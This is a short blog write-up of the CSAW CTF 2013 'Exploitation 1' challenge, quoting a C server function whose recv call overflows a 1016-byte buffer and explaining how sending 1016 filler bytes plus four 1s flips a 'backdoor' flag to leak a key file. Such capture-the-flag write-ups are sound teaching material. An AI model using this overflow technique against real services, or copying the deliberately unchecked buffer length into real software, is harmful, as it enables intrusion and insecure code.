Monday, September 23, 2013

CSAW CTF 2013 :: Exploitation 1 - 100 points

For this challenge, the following code snippet was given in a file, exploit1.c

[snip]void handle(int newsock) {
    int backdoor = 0;
    char buffer[1016];
    memset(buffer, 0, 1016);

    send(newsock, "Welcome to CSAW CTF.", 21, 0);
    recv(newsock, buffer, 1020, 0);
    buffer[1015] = 0;

    if ( backdoor ) {
        fd = fopen("./key", "r");
        fscanf(fd, "%s\n", buffer);
        send(newsock, buffer, 512, 0);
    }
    close(newsock);
}
[snip]


A netcat connection command was also provided. "nc 128.238.66.212 31337".

Based on the netcat command given and the code snippet given, it can be inferred that we were suppose to open a netcat connection to the IP and port provided. The code snippet was likely to be from the server part of the connection.

Taking a closer look at the code snippet, it seems like the program will read from a .key file when backdoor is true/1. It can also be inferred that a buffer size of 1016 has been set aside, however in recv(), a size of 1020 has been declared as the size of the buffer. This will result in a buffer overflow problem when a string of more than 1016 characters is send to the netcat server. As a result of how the function variables is stored on the stack, the buffer overflow will affect the value of the backdoor variable.

Therefore to solve this challenge, all we needed to do was send any character string of random data of length 1016 and four 1s to the server. The server should reply with the data stored in the .key file.






As shown, we have managed to successfully obtain the keys for this challenge!


No comments:

Post a Comment